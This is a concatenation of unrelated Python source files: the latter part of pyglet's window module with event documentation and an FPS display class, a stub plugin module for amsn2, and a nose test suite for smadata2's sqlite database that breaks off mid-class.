            gl.glPushMatrix()
            gl.glLoadIdentity()
            gl.glOrtho(0, self.width, 0, self.height, -1, 1)

            gl.glMatrixMode(gl.GL_MODELVIEW)
            gl.glPushMatrix()
            gl.glLoadIdentity()

            self._mouse_cursor.draw(self._mouse_x, self._mouse_y)

            gl.glMatrixMode(gl.GL_PROJECTION)
            gl.glPopMatrix()

            gl.glMatrixMode(gl.GL_MODELVIEW)
            gl.glPopMatrix()

    # Properties provide read-only access to instance variables.  Use
    # set_* methods to change them if applicable.

    @property
    def caption(self):
        """The window caption (title).  Read-only.

        :type: str
        """
        return self._caption

    @property
    def resizeable(self):
        """True if the window is resizable.  Read-only.

        :type: bool
        """
        return self._resizable

    @property
    def style(self):
        """The window style; one of the ``WINDOW_STYLE_*`` constants.
        Read-only.

        :type: int
        """
        return self._style

    @property
    def fullscreen(self):
        """True if the window is currently fullscreen.  Read-only.

        :type: bool
        """
        return self._fullscreen

    @property
    def visible(self):
        """True if the window is currently visible.  Read-only.

        :type: bool
        """
        return self._visible

    @property
    def vsync(self):
        """True if buffer flips are synchronised to the screen's vertical
        retrace.  Read-only.

        :type: bool
        """
        return self._vsync

    @property
    def display(self):
        """The display this window belongs to.  Read-only.

        :type: `Display`
        """
        return self._display

    @property
    def screen(self):
        """The screen this window is fullscreen in.  Read-only.

        :type: `Screen`
        """
        return self._screen

    @property
    def config(self):
        """A GL config describing the context of this window.  Read-only.

        :type: `pyglet.gl.Config`
        """
        return self._config

    @property
    def context(self):
        """The OpenGL context attached to this window.  Read-only.

        :type: `pyglet.gl.Context`
        """
        return self._context

    # These are the only properties that can be set
    @property
    def width(self):
        """The width of the window, in pixels.  Read-write.

        :type: int
        """
        return self.get_size()[0]

    @width.setter
    def width(self, new_width):
        self.set_size(new_width, self.height)

    @property
    def height(self):
        """The height of the window, in pixels.  Read-write.

        :type: int
        """
        return self.get_size()[1]

    @height.setter
    def height(self, new_height):
        self.set_size(self.width, new_height)

    def set_caption(self, caption):
        """Set the window's caption.

        The caption appears in the titlebar of the window, if it has one,
        and in the taskbar on Windows and many X11 window managers.

        :Parameters:
            `caption` : str or unicode
                The caption to set.

        """
        raise NotImplementedError('abstract')

    def set_minimum_size(self, width, height):
        """Set the minimum size of the window.

        Once set, the user will not be able to resize the window smaller
        than the given dimensions.  There is no way to remove the
        minimum size constraint on a window (but you could set it to 0,0).

        The behaviour is undefined if the minimum size is set larger than
        the current size of the window.

        The window size does not include the border or title bar.

        :Parameters:
            `width` : int
                Minimum width of the window, in pixels.
            `height` : int
                Minimum height of the window, in pixels.

        """
        raise NotImplementedError('abstract')

    def set_maximum_size(self, width, height):
        """Set the maximum size of the window.

        Once set, the user will not be able to resize the window larger
        than the given dimensions.  There is no way to remove the
        maximum size constraint on a window (but you could set it to a large
        value).

        The behaviour is undefined if the maximum size is set smaller than
        the current size of the window.

        The window size does not include the border or title bar.

        :Parameters:
            `width` : int
                Maximum width of the window, in pixels.
            `height` : int
                Maximum height of the window, in pixels.

        """
        raise NotImplementedError('abstract')

    def set_size(self, width, height):
        """Resize the window.
        
        The behaviour is undefined if the window is not resizable, or if
        it is currently fullscreen.

        The window size does not include the border or title bar.

        :Parameters:
            `width` : int
                New width of the window, in pixels.
            `height` : int
                New height of the window, in pixels.

        """
        raise NotImplementedError('abstract')

    def get_size(self):
        """Return the current size of the window.

        The window size does not include the border or title bar.

        :rtype: (int, int)
        :return: The width and height of the window, in pixels.
        """
        raise NotImplementedError('abstract')

    def set_location(self, x, y):
        """Set the position of the window.

        :Parameters:
            `x` : int
                Distance of the left edge of the window from the left edge
                of the virtual desktop, in pixels.
            `y` : int
                Distance of the top edge of the window from the top edge of
                the virtual desktop, in pixels.

        """
        raise NotImplementedError('abstract')

    def get_location(self):
        """Return the current position of the window.

        :rtype: (int, int)
        :return: The distances of the left and top edges from their respective
            edges on the virtual desktop, in pixels.
        """
        raise NotImplementedError('abstract')

    def activate(self):
        """Attempt to restore keyboard focus to the window.

        Depending on the window manager or operating system, this may not
        be successful.  For example, on Windows XP an application is not
        allowed to "steal" focus from another application.  Instead, the
        window's taskbar icon will flash, indicating it requires attention.
        """
        raise NotImplementedError('abstract')

    def set_visible(self, visible=True):    
        """Show or hide the window.

        :Parameters:
            `visible` : bool
                If True, the window will be shown; otherwise it will be
                hidden.

        """
        raise NotImplementedError('abstract')

    def minimize(self):
        """Minimize the window.
        """
        raise NotImplementedError('abstract')

    def maximize(self):
        """Maximize the window.

        The behaviour of this method is somewhat dependent on the user's
        display setup.  On a multi-monitor system, the window may maximize
        to either a single screen or the entire virtual desktop.
        """
        raise NotImplementedError('abstract')

    def set_vsync(self, vsync):
        """Enable or disable vertical sync control.

        When enabled, this option ensures flips from the back to the front
        buffer are performed only during the vertical retrace period of the
        primary display.  This can prevent "tearing" or flickering when
        the buffer is updated in the middle of a video scan.

        Note that LCD monitors have an analogous time in which they are not
        reading from the video buffer; while it does not correspond to
        a vertical retrace it has the same effect.

        With multi-monitor systems the secondary monitor cannot be
        synchronised to, so tearing and flicker cannot be avoided when the
        window is positioned outside of the primary display.  In this case
        it may be advisable to forcibly reduce the framerate (for example,
        using `pyglet.clock.set_fps_limit`).

        :Parameters:
            `vsync` : bool
                If True, vsync is enabled, otherwise it is disabled.

        """
        raise NotImplementedError('abstract')

    def set_mouse_visible(self, visible=True):
        """Show or hide the mouse cursor.

        The mouse cursor will only be hidden while it is positioned within
        this window.  Mouse events will still be processed as usual.

        :Parameters:
            `visible` : bool
                If True, the mouse cursor will be visible, otherwise it
                will be hidden.

        """
        self._mouse_visible = visible
        self.set_mouse_platform_visible()

    def set_mouse_platform_visible(self, platform_visible=None):
        """Set the platform-drawn mouse cursor visibility.  This is called
        automatically after changing the mouse cursor or exclusive mode.

        Applications should not normally need to call this method, see
        `set_mouse_visible` instead.

        :Parameters:
            `platform_visible` : bool or None
                If None, sets platform visibility to the required visibility
                for the current exclusive mode and cursor type.  Otherwise,
                a bool value will override and force a visibility.

        """
        raise NotImplementedError()

    def set_mouse_cursor(self, cursor=None):
        """Change the appearance of the mouse cursor.

        The appearance of the mouse cursor is only changed while it is
        within this window.

        :Parameters:
            `cursor` : `MouseCursor`
                The cursor to set, or None to restore the default cursor.

        """
        if cursor is None:
            cursor = DefaultMouseCursor()
        self._mouse_cursor = cursor
        self.set_mouse_platform_visible()

    def set_exclusive_mouse(self, exclusive=True):
        """Hide the mouse cursor and direct all mouse events to this
        window.

        When enabled, this feature prevents the mouse leaving the window.  It
        is useful for certain styles of games that require complete control of
        the mouse.  The position of the mouse as reported in subsequent events
        is meaningless when exclusive mouse is enabled; you should only use
        the relative motion parameters ``dx`` and ``dy``.

        :Parameters:
            `exclusive` : bool
                If True, exclusive mouse is enabled, otherwise it is disabled.

        """
        raise NotImplementedError('abstract')

    def set_exclusive_keyboard(self, exclusive=True):
        """Prevent the user from switching away from this window using
        keyboard accelerators.

        When enabled, this feature disables certain operating-system specific
        key combinations such as Alt+Tab (Command+Tab on OS X).  This can be
        useful in certain kiosk applications, it should be avoided in general
        applications or games.

        :Parameters:
            `exclusive` : bool
                If True, exclusive keyboard is enabled, otherwise it is
                disabled.

        """
        raise NotImplementedError('abstract')

    def get_system_mouse_cursor(self, name):
        """Obtain a system mouse cursor.

        Use `set_mouse_cursor` to make the cursor returned by this method
        active.  The names accepted by this method are the ``CURSOR_*``
        constants defined on this class.

        :Parameters:
            `name` : str
                Name describing the mouse cursor to return.  For example,
                ``CURSOR_WAIT``, ``CURSOR_HELP``, etc.

        :rtype: `MouseCursor`
        :return: A mouse cursor which can be used with `set_mouse_cursor`.
        """
        raise NotImplementedError()

    def set_icon(self, *images):
        """Set the window icon.

        If multiple images are provided, one with an appropriate size 
        will be selected (if the correct size is not provided, the image
        will be scaled).

        Useful sizes to provide are 16x16, 32x32, 64x64 (Mac only) and
        128x128 (Mac only).

        :Parameters:
            `images` : sequence of `pyglet.image.AbstractImage`
                List of images to use for the window icon.
        
        """
        pass

    def clear(self):
        """Clear the window.

        This is a convenience method for clearing the color and depth
        buffer.  The window must be the active context (see `switch_to`).
        """
        gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)
    
    def dispatch_event(self, *args):
        if not self._enable_event_queue or self._allow_dispatch_event:
            if EventDispatcher.dispatch_event(self, *args) != False:
                self._legacy_invalid = True
        else:
            self._event_queue.append(args)

    def dispatch_events(self):
        """Poll the operating system event queue for new events and call
        attached event handlers.

        This method is provided for legacy applications targeting pyglet 1.0,
        and advanced applications that must integrate their event loop
        into another framework.

        Typical applications should use `pyglet.app.run`.
        """
        raise NotImplementedError('abstract')

    # If documenting, show the event methods.  Otherwise, leave them out
    # as they are not really methods.
    if _is_epydoc:
        def on_key_press(symbol, modifiers):
            """A key on the keyboard was pressed (and held down).

            In pyglet 1.0 the default handler sets `has_exit` to ``True`` if
            the ``ESC`` key is pressed.

            In pyglet 1.1 the default handler dispatches the `on_close`
            event if the ``ESC`` key is pressed.

            :Parameters:
                `symbol` : int
                    The key symbol pressed.
                `modifiers` : int
                    Bitwise combination of the key modifiers active.
            
            :event:
            """

        def on_key_release(symbol, modifiers):
            """A key on the keyboard was released.

            :Parameters:
                `symbol` : int
                    The key symbol pressed.
                `modifiers` : int
                    Bitwise combination of the key modifiers active.

            :event:
            """

        def on_text(text):
            """The user input some text.

            Typically this is called after `on_key_press` and before
            `on_key_release`, but may also be called multiple times if the key
            is held down (key repeating); or called without key presses if
            another input method was used (e.g., a pen input).

            You should always use this method for interpreting text, as the
            key symbols often have complex mappings to their unicode
            representation which this event takes care of.

            :Parameters:
                `text` : unicode
                    The text entered by the user.

            :event:
            """

        def on_text_motion(motion):
            """The user moved the text input cursor.

            Typically this is called after `on_key_press` and before
            `on_key_release`, but may also be called multiple times if the key
            is help down (key repeating).

            You should always use this method for moving the text input cursor
            (caret), as different platforms have different default keyboard
            mappings, and key repeats are handled correctly.

            The values that `motion` can take are defined in
            `pyglet.window.key`:

            * MOTION_UP
            * MOTION_RIGHT
            * MOTION_DOWN
            * MOTION_LEFT
            * MOTION_NEXT_WORD
            * MOTION_PREVIOUS_WORD
            * MOTION_BEGINNING_OF_LINE
            * MOTION_END_OF_LINE
            * MOTION_NEXT_PAGE
            * MOTION_PREVIOUS_PAGE
            * MOTION_BEGINNING_OF_FILE
            * MOTION_END_OF_FILE
            * MOTION_BACKSPACE
            * MOTION_DELETE

            :Parameters:
                `motion` : int
                    The direction of motion; see remarks.

            :event:
            """

        def on_text_motion_select(motion):
            """The user moved the text input cursor while extending the
            selection.

            Typically this is called after `on_key_press` and before
            `on_key_release`, but may also be called multiple times if the key
            is help down (key repeating).

            You should always use this method for responding to text selection
            events rather than the raw `on_key_press`, as different platforms
            have different default keyboard mappings, and key repeats are
            handled correctly.

            The values that `motion` can take are defined in `pyglet.window.key`:

            * MOTION_UP
            * MOTION_RIGHT
            * MOTION_DOWN
            * MOTION_LEFT
            * MOTION_NEXT_WORD
            * MOTION_PREVIOUS_WORD
            * MOTION_BEGINNING_OF_LINE
            * MOTION_END_OF_LINE
            * MOTION_NEXT_PAGE
            * MOTION_PREVIOUS_PAGE
            * MOTION_BEGINNING_OF_FILE
            * MOTION_END_OF_FILE

            :Parameters:
                `motion` : int
                    The direction of selection motion; see remarks.

            :event:
            """

        def on_mouse_motion(x, y, dx, dy):
            """The mouse was moved with no buttons held down.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `dx` : int
                    Relative X position from the previous mouse position.
                `dy` : int
                    Relative Y position from the previous mouse position.

            :event:
            """

        def on_mouse_drag(x, y, dx, dy, buttons, modifiers):
            """The mouse was moved with one or more mouse buttons pressed.

            This event will continue to be fired even if the mouse leaves
            the window, so long as the drag buttons are continuously held down.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `dx` : int
                    Relative X position from the previous mouse position.
                `dy` : int
                    Relative Y position from the previous mouse position.
                `buttons` : int
                    Bitwise combination of the mouse buttons currently pressed.
                `modifiers` : int
                    Bitwise combination of any keyboard modifiers currently
                    active.

            :event:
            """

        def on_mouse_press(x, y, button, modifiers):
            """A mouse button was pressed (and held down).

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `button` : int
                    The mouse button that was pressed.
                `modifiers` : int
                    Bitwise combination of any keyboard modifiers currently
                    active.
                
            :event:
            """

        def on_mouse_release(x, y, button, modifiers):
            """A mouse button was released.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `button` : int
                    The mouse button that was released.
                `modifiers` : int
                    Bitwise combination of any keyboard modifiers currently
                    active.

            :event:
            """
                
        def on_mouse_scroll(x, y, scroll_x, scroll_y):
            """The mouse wheel was scrolled.

            Note that most mice have only a vertical scroll wheel, so
            `scroll_x` is usually 0.  An exception to this is the Apple Mighty
            Mouse, which has a mouse ball in place of the wheel which allows
            both `scroll_x` and `scroll_y` movement.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.
                `scroll_x` : int
                    Number of "clicks" towards the right (left if negative).
                `scroll_y` : int
                    Number of "clicks" upwards (downwards if negative).

            :event:
            """

        def on_close():
            """The user attempted to close the window.

            This event can be triggered by clicking on the "X" control box in
            the window title bar, or by some other platform-dependent manner.

            The default handler sets `has_exit` to ``True``.  In pyglet 1.1, if
            `pyglet.app.event_loop` is being used, `close` is also called,
            closing the window immediately.

            :event:
            """

        def on_mouse_enter(x, y):
            """The mouse was moved into the window.

            This event will not be trigged if the mouse is currently being
            dragged.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.

            :event:
            """

        def on_mouse_leave(x, y):
            """The mouse was moved outside of the window.

            This event will not be trigged if the mouse is currently being
            dragged.  Note that the coordinates of the mouse pointer will be
            outside of the window rectangle.

            :Parameters:
                `x` : int
                    Distance in pixels from the left edge of the window.
                `y` : int
                    Distance in pixels from the bottom edge of the window.

            :event:
            """

        def on_expose():
            """A portion of the window needs to be redrawn.

            This event is triggered when the window first appears, and any time
            the contents of the window is invalidated due to another window
            obscuring it.

            There is no way to determine which portion of the window needs
            redrawing.  Note that the use of this method is becoming
            increasingly uncommon, as newer window managers composite windows
            automatically and keep a backing store of the window contents.

            :event:
            """

        def on_resize(width, height):
            """The window was resized.

            The window will have the GL context when this event is dispatched;
            there is no need to call `switch_to` in this handler.

            :Parameters:
                `width` : int
                    The new width of the window, in pixels.
                `height` : int
                    The new height of the window, in pixels.

            :event:
            """

        def on_move(x, y):
            """The window was moved.

            :Parameters:
                `x` : int
                    Distance from the left edge of the screen to the left edge
                    of the window.
                `y` : int
                    Distance from the top edge of the screen to the top edge of
                    the window.  Note that this is one of few methods in pyglet
                    which use a Y-down coordinate system.

            :event:
            """

        def on_activate():
            """The window was activated.

            This event can be triggered by clicking on the title bar, bringing
            it to the foreground; or by some platform-specific method.

            When a window is "active" it has the keyboard focus.

            :event:
            """

        def on_deactivate():
            """The window was deactivated.

            This event can be triggered by clicking on another application
            window.  When a window is deactivated it no longer has the
            keyboard focus.

            :event:
            """

        def on_show():
            """The window was shown.

            This event is triggered when a window is restored after being
            minimised, or after being displayed for the first time.

            :event:
            """

        def on_hide():
            """The window was hidden.

            This event is triggered when a window is minimised or (on Mac OS X)
            hidden by the user.

            :event:
            """

        def on_context_lost():
            """The window's GL context was lost.
            
            When the context is lost no more GL methods can be called until it
            is recreated.  This is a rare event, triggered perhaps by the user
            switching to an incompatible video mode.  When it occurs, an
            application will need to reload all objects (display lists, texture
            objects, shaders) as well as restore the GL state.

            :event:
            """

        def on_context_state_lost():
            """The state of the window's GL context was lost.

            pyglet may sometimes need to recreate the window's GL context if
            the window is moved to another video device, or between fullscreen
            or windowed mode.  In this case it will try to share the objects
            (display lists, texture objects, shaders) between the old and new
            contexts.  If this is possible, only the current state of the GL
            context is lost, and the application should simply restore state.

            :event:
            """

        def on_draw():
            """The window contents must be redrawn.

            The `EventLoop` will dispatch this event when the window
            should be redrawn.  This will happen during idle time after
            any window events and after any scheduled functions were called.

            The window will already have the GL context, so there is no
            need to call `switch_to`.  The window's `flip` method will
            be called after this event, so your event handler should not.

            You should make no assumptions about the window contents when
            this event is triggered; a resize or expose event may have
            invalidated the framebuffer since the last time it was drawn.

            :since: pyglet 1.1

            :event:
            """

BaseWindow.register_event_type('on_key_press')
BaseWindow.register_event_type('on_key_release')
BaseWindow.register_event_type('on_text')
BaseWindow.register_event_type('on_text_motion')
BaseWindow.register_event_type('on_text_motion_select')
BaseWindow.register_event_type('on_mouse_motion')
BaseWindow.register_event_type('on_mouse_drag')
BaseWindow.register_event_type('on_mouse_press')
BaseWindow.register_event_type('on_mouse_release')
BaseWindow.register_event_type('on_mouse_scroll')
BaseWindow.register_event_type('on_mouse_enter')
BaseWindow.register_event_type('on_mouse_leave')
BaseWindow.register_event_type('on_close')
BaseWindow.register_event_type('on_expose')
BaseWindow.register_event_type('on_resize')
BaseWindow.register_event_type('on_move')
BaseWindow.register_event_type('on_activate')
BaseWindow.register_event_type('on_deactivate')
BaseWindow.register_event_type('on_show')
BaseWindow.register_event_type('on_hide')
BaseWindow.register_event_type('on_context_lost')
BaseWindow.register_event_type('on_context_state_lost')
BaseWindow.register_event_type('on_draw')


class FPSDisplay(object):
    """Display of a window's framerate.

    This is a convenience class to aid in profiling and debugging.  Typical
    usage is to create an `FPSDisplay` for each window, and draw the display
    at the end of the windows' `on_draw` event handler::

        window = pyglet.window.Window()
        fps_display = FPSDisplay(window)

        @window.event
        def on_draw():
            # ... perform ordinary window drawing operations ...

            fps_display.draw()

    The style and position of the display can be modified via the `label`
    attribute.  Different text can be substituted by overriding the
    `set_fps` method.  The display can be set to update more or less often 
    by setting the `update_period` attribute.

    :Ivariables:
        `label` : Label
            The text label displaying the framerate. 

    """

    #: Time in seconds between updates.
    #:
    #: :type: float
    update_period = 0.25

    def __init__(self, window):
        from time import time
        from pyglet.text import Label
        self.label = Label('', x=10, y=10, 
                           font_size=24, bold=True,
                           color=(127, 127, 127, 127))

        self.window = window
        self._window_flip = window.flip
        window.flip = self._hook_flip

        self.time = 0.0
        self.last_time = time()
        self.count = 0

    def update(self):
        """Records a new data point at the current time.  This method
        is called automatically when the window buffer is flipped.
        """
        from time import time
        t = time()
        self.count += 1
        self.time += t - self.last_time
        self.last_time = t

        if self.time >= self.update_period:
            self.set_fps(self.count / self.update_period)
            self.time %= self.update_period
            self.count = 0

    def set_fps(self, fps):
        """Set the label text for the given FPS estimation.

        Called by `update` every `update_period` seconds.

        :Parameters:
            `fps` : float
                Estimated framerate of the window.

        """
        self.label.text = '%.2f' % fps

    def draw(self):
        """Draw the label.

        The OpenGL state is assumed to be at default values, except
        that the MODELVIEW and PROJECTION matrices are ignored.  At
        the return of this method the matrix mode will be MODELVIEW.
        """
        gl.glMatrixMode(gl.GL_MODELVIEW)
        gl.glPushMatrix()
        gl.glLoadIdentity()

        gl.glMatrixMode(gl.GL_PROJECTION)
        gl.glPushMatrix()
        gl.glLoadIdentity()
        gl.glOrtho(0, self.window.width, 0, self.window.height, -1, 1)
        
        self.label.draw()

        gl.glPopMatrix()

        gl.glMatrixMode(gl.GL_MODELVIEW)
        gl.glPopMatrix()

    def _hook_flip(self):
        self.update()
        self._window_flip()

if _is_epydoc:
    # We are building documentation
    Window = BaseWindow
    Window.__name__ = 'Window'
    del BaseWindow

    
else:
    # Try to determine which platform to use.
    if pyglet.compat_platform == 'darwin':
        if pyglet.options['darwin_cocoa']:
            from pyglet.window.cocoa import CocoaWindow as Window
        else:
            from pyglet.window.carbon import CarbonWindow as Window
    elif pyglet.compat_platform in ('win32', 'cygwin'):
        from pyglet.window.win32 import Win32Window as Window
    else:
        # XXX HACK around circ problem, should be fixed after removal of
        # shadow nonsense
        #pyglet.window = sys.modules[__name__]
        #import key, mouse

        from pyglet.window.xlib import XlibWindow as Window


# Deprecated API
def get_platform():
    """Get an instance of the Platform most appropriate for this
    system.

    :deprecated: Use `pyglet.canvas.Display`.

    :rtype: `Platform`
    :return: The platform instance.
    """
    return Platform()


class Platform(object):
    """Operating-system-level functionality.

    The platform instance can only be obtained with `get_platform`.  Use
    the platform to obtain a `Display` instance.

    :deprecated: Use `pyglet.canvas.Display`
    """
    def get_display(self, name):
        """Get a display device by name.

        This is meaningful only under X11, where the `name` is a
        string including the host name and display number; for example
        ``"localhost:1"``.

        On platforms other than X11, `name` is ignored and the default
        display is returned.  pyglet does not support multiple multiple
        video devices on Windows or OS X.  If more than one device is
        attached, they will appear as a single virtual device comprising
        all the attached screens.

        :deprecated: Use `pyglet.canvas.get_display`.

        :Parameters:
            `name` : str
                The name of the display to connect to.

        :rtype: `Display`
        """
        for display in pyglet.app.displays:
            if display.name == name:
                return display
        return pyglet.canvas.Display(name)

    def get_default_display(self):
        """Get the default display device.

        :deprecated: Use `pyglet.canvas.get_display`.

        :rtype: `Display`
        """
        return pyglet.canvas.get_display()

if _is_epydoc:
    class Display(object):
        """A display device supporting one or more screens.

        Use `Platform.get_display` or `Platform.get_default_display` to obtain
        an instance of this class.  Use a display to obtain `Screen` instances.

        :deprecated: Use `pyglet.canvas.Display`.
        """
        def __init__(self):
            raise NotImplementedError('deprecated')

        def get_screens(self):
            """Get the available screens.

            A typical multi-monitor workstation comprises one `Display` with
            multiple `Screen` s.  This method returns a list of screens which
            can be enumerated to select one for full-screen display.

            For the purposes of creating an OpenGL config, the default screen
            will suffice.

            :rtype: list of `Screen`
            """
            raise NotImplementedError('deprecated')

        def get_default_screen(self):
            """Get the default screen as specified by the user's operating system
            preferences.

            :rtype: `Screen`
            """
            raise NotImplementedError('deprecated')

        def get_windows(self):
            """Get the windows currently attached to this display.

            :rtype: sequence of `Window`
            """
            raise NotImplementedError('deprecated')
else:
    Display = pyglet.canvas.Display
    Screen = pyglet.canvas.Screen


# XXX remove
# Create shadow window. (trickery is for circular import)
if not _is_epydoc:
    pyglet.window = sys.modules[__name__]
    gl._create_shadow_window()


# plugins module for amsn2
"""
Plugins with amsn2 will be a subclass of the aMSNPlugin() class.
When this module is initially imported it should load the plugins from the last session. Done in the init() proc.
Then the GUI should call plugins.loadPlugin(name) or plugins.unLoadPlugin(name) in order to deal with plugins.
"""

# init()
# Called when the plugins module is imported (only for the first time).
# Should find plugins and populate a list ready for getPlugins().
# Should also auto-update all plugins.
def init(): pass

# loadPlugin(plugin_name)
# Called (by the GUI or from init()) to load a plugin. plugin_name as set in plugin's XML (or from getPlugins()).
# This loads the module for the plugin. The module is then responsible for calling plugins.registerPlugin(instance).
def loadPlugin(plugin_name): 
    """
    @type plugin_name: str
    """
    pass

# unLoadPlugin(plugin_name)
# Called to unload a plugin. Name is name as set in plugin's XML.
def unLoadPlugin(plugin_name): 
    """
    @type plugin_name: str
    """
    pass

# registerPlugin(plugin_instance)
# Saves the instance of the plugin, and registers it in the loaded list.
def registerPlugin(plugin_instance): 
    """
    @type plugin_instance: L{amsn2.plugins.developers.aMSNPlugin}
    """
    pass

# getPlugins()
# Returns a list of all available plugins, as in ['Plugin 1', 'Plugin 2']
def getPlugins(): pass

# getPluginsWithStatus()
# Returns a list with a list item for each plugin with the plugin's name, and Loaded or NotLoaded either way.
# IE: [['Plugin 1', 'Loaded'], ['Plugin 2', 'NotLoaded']]
def getPluginsWithStatus(): pass

# getLoadedPlugins()
# Returns a list of loaded plugins. as in ['Plugin 1', 'Plugin N']
def getLoadedPlugins(): pass

# findPlugin(plugin_name)
# Retruns the running instance of the plugin with name plugin_name, or None if not found.
def findPlugin(plugin_name): 
    """
    @type plugin_name: str
    """
    pass

# saveConfig(plugin_name, data)
def saveConfig(plugin_name, data): 
    """
    @type plugin_name: str
    @type data: object
    """
    pass

# Calls the init procedure.
# Will only be called on the first import (thanks to python).
init()

#! /usr/bin/env python

from __future__ import print_function

import StringIO
import os
import os.path
import errno
import sqlite3

from nose.tools import *

import smadata2.db
import smadata2.db.mock
from smadata2 import check

def removef(filename):
    try:
        os.remove(filename)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise


class BaseDBChecker(object):
    def setUp(self):
        self.db = self.opendb()
        self.sample_data()

    def tearDown(self):
        pass

    def sample_data(self):
        pass


class MockDBChecker(BaseDBChecker):
    def opendb(self):
        return smadata2.db.mock.MockDatabase()


class BaseSQLite(object):
    def prepare_sqlite(self):
        self.dbname = "__testdb__smadata2_%s_.sqlite" % self.__class__.__name__
        self.bakname = self.dbname + ".bak"

        # Start with a blank slate
        removef(self.dbname)
        removef(self.bakname)

        self.prepopulate()

        if os.path.exists(self.dbname):
            self.original = open(self.dbname).read()
        else:
            self.original = None

    def prepopulate(self):
        pass


class SQLiteDBChecker(BaseSQLite, BaseDBChecker):
    def opendb(self):
        self.prepare_sqlite()
        return smadata2.db.sqlite.create_or_update(self.dbname)

    def tearDown(self):
        removef(self.dbname)
        removef(self.bakname)
        super(SQLiteDBChecker, self).tearDown()


class SimpleChecks(BaseDBChecker):
    def test_trivial(self):
        assert isinstance(self.db, smadata2.db.base.BaseDatabase)

    def test_add_get_historic(self):
        # Serial is defined as INTEGER, but we abuse the fact that
        # sqlite doesn't actually make a distinction
        serial = "__TEST__"

        self.db.add_historic(serial, 0, 0)
        self.db.add_historic(serial, 300, 10)
        self.db.add_historic(serial, 3600, 20)

        v0 = self.db.get_one_historic(serial, 0)
        assert_equals(v0, 0)

        v300 = self.db.get_one_historic(serial, 300)
        assert_equals(v300, 10)

        v3600 = self.db.get_one_historic(serial, 3600)
        assert_equals(v3600, 20)

        vmissing = self.db.get_one_historic(serial, 9999)
        assert vmissing is None

    def test_get_last_historic_missing(self):
        serial = "__TEST__"

        last = self.db.get_last_historic(serial)
        assert last is None

    def test_get_last_historic(self):
        serial = "__TEST__"

        self.db.add_historic(serial, 0, 0)
        assert_equals(self.db.get_last_historic(serial), 0)

        self.db.add_historic(serial, 300, 0)
        assert_equals(self.db.get_last_historic(serial), 300)

        self.db.add_historic(serial, 3600, 0)
        assert_equals(self.db.get_last_historic(serial), 3600)

        self.db.add_historic(serial, 2000, 0)
        assert_equals(self.db.get_last_historic(serial), 3600)


class AggregateChecks(BaseDBChecker):
    def sample_data(self):
        super(AggregateChecks, self).sample_data()

        self.serial1 = "__TEST__1"
        self.serial2 = "__TEST__2"

        self.dawn = 8*3600
        self.dusk = 20*3600

        sampledata = check.generate_linear(0, self.dawn, self.dusk, 24*3600,
                                           0, 1)

        for ts, y in sampledata:
            self.db.add_historic(self.serial1, ts, y)
            self.db.add_historic(self.serial2, ts, 2*y)

    def test_basic(self):
        for ts in range(0, self.dawn, 300):
            y1 = self.db.get_one_historic(self.serial1, ts)
            y2 = self.db.get_one_historic(self.serial2, ts)

            assert_equals(y1, 0)
            assert_equals(y2, 0)

        for i, ts in enumerate(range(self.dawn, self.dusk, 300)):
            y1 = self.db.get_one_historic(self.serial1, ts)
            y2 = self.db.get_one_historic(self.serial2, ts)

            assert_equals(y1, i)
            assert_equals(y2, 2*i)

        val = (self.dusk - self.dawn - 1) / 300
        for ts in range(self.dusk, 24*3600, 300):
            y1 = self.db.get_one_historic(self.serial1, ts)
            y2 = self.db.get_one_historic(self.serial2, ts)

            assert_equals(y1, val)
            assert_equals(y2, 2*val)

    def test_aggregate_one(self):
        val = self.db.get_aggregate_one_historic(self.dusk,
                                                 (self.serial1, self.serial2))
        assert_equals(val, 3*((self.dusk - self.dawn - 2) / 300))

    def check_aggregate_range(self, from_, to_):
        results = self.db.get_aggregate_historic(from_, to_,
                                                 (self.serial1, self.serial2))

        first = results[0][0]
        last = results[-1][0]

        assert_equals(first, from_)
        assert_equals(last, to_ - 300)

        for ts, y in results:
            if ts < self.dawn:
                assert_equals(y, 0)
            elif ts < self.dusk:
                assert_equals(y, 3*((ts - self.dawn) / 300))
            else:
                assert_equals(y, 3*((self.dusk - self.dawn - 1) / 300))

    def test_aggregate(self):
        yield self.check_aggregate_range, 0, 24*3600
        yield self.check_aggregate_range, 8*3600, 20*3600
        yield self.check_aggregate_range, 13*3600, 14*3600


#
# Construct the basic tests as a cross-product
#
for cset in (SimpleChecks, AggregateChecks):
    for db in (MockDBChecker, SQLiteDBChecker):
        name = "_".join(("Test", cset.__name__, db.__name__))
        globals()[name] = type(name, (cset, db), {})


#
# Tests for sqlite schema updating
#
class UpdateSQLiteChecker(Test_SimpleChecks_SQLiteDBChecker):
    PRESERVE_RECORD = ("PRESERVE", 0, 31415)

    def test_backup(self):
        assert os.path.exists(self.bakname)
        backup = open(self.bakname).read()
        assert_equals(self.original, backup)

    def test_preserved(self):
        serial, timestamp, tyield = self.PRESERVE_RECORD

        assert_equals(self.db.get_last_historic(serial), timestamp)
        assert_equals(self.db.get_one_historic(serial, timestamp), tyield)


class TestUpdateNoPVO(UpdateSQLiteChecker):
    def prepopulate(self):
        DB_MAGIC = 0x71534d41
        DB_VERSION = 0

        conn = sqlite3.connect(self.dbname)
        conn.executescript("""
CREATE TABLE generation (inverter_serial INTEGER,
                            timestamp INTEGER,
                            total_yield INTEGER,
                            PRIMARY KEY (inverter_serial, timestamp));
CREATE TABLE schema (magic INTEGER, version INTEGER);""")
        conn.execute("INSERT INTO schema (magic, version) VALUES (?, ?)",
                     (DB_MAGIC, DB_VERSION))
        conn.commit()


        conn.execute("""INSERT INTO generation (inverter_serial, timestamp,
                                                 total_yield)
                            VALUES (?, ?, ?)""", self.PRESERVE_RECORD)
        conn.commit()

        del conn


class TestUpdateV0(UpdateSQLiteChecker):
